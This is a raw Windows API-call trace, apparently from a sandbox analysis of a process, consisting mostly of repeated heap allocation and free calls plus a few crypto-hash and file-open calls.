HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0251.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0251.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0251.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0251.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0251.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0251.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0251.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0251.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0251.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0251.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0251.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0251.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0251.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0251.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0251.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0251.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0251.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0251.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0251.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0251.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0251.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0251.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0251.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0251.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0251.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0251.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0251.074] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0251.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0251.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0251.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0251.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0251.074] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.075] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0251.075] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0251.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0251.075] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0251.075] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0251.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0251.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0251.075] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0251.075] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0251.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0251.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0251.076] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0251.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0251.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0251.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0251.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0251.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69988 [0251.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69988, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0251.076] CryptDestroyHash (hHash=0xa870d0) returned 1 [0251.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0251.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0251.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0251.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0251.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0251.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0251.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0251.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0251.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0251.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0251.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0251.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0251.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0251.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0251.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0251.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0251.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0251.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0251.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0251.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0251.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0251.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0251.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0251.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0251.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0251.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0251.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0251.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0251.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0251.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0251.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0251.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0251.078] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0251.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0251.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0251.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0251.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0251.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0251.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0251.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0251.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0251.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0251.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0251.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0251.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0251.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0251.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0251.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0251.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0251.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0251.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0251.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0251.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0251.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0251.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0251.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0251.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0251.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0251.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0251.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0251.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0251.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0251.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0251.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0251.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0251.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0251.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0251.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0251.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0251.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0251.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0251.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0251.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0251.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0251.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0251.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0251.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0251.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0251.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0251.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0251.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0251.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0251.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0251.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0251.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0251.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0251.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0251.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0251.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0251.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0251.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0251.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0251.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0251.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0251.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0251.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0251.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0251.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0251.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0251.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0251.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0251.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0251.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0251.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0251.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0251.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0251.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0251.283] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0251.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0251.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0251.283] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0251.283] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0251.283] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0251.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0251.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0251.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0251.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0251.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0251.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0251.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0251.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0251.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0251.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0251.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0251.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0251.287] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/NU6pYHrnfbris-w219Y.png" (normalized: "c:\\users\\fd1hvy\\pictures\\nu6pyhrnfbris-w219y.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0251.287] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0251.287] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0251.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0251.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0251.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0251.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0251.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0251.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0251.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0251.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0251.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0251.288] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0251.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0251.288] RtlAllocateHeap 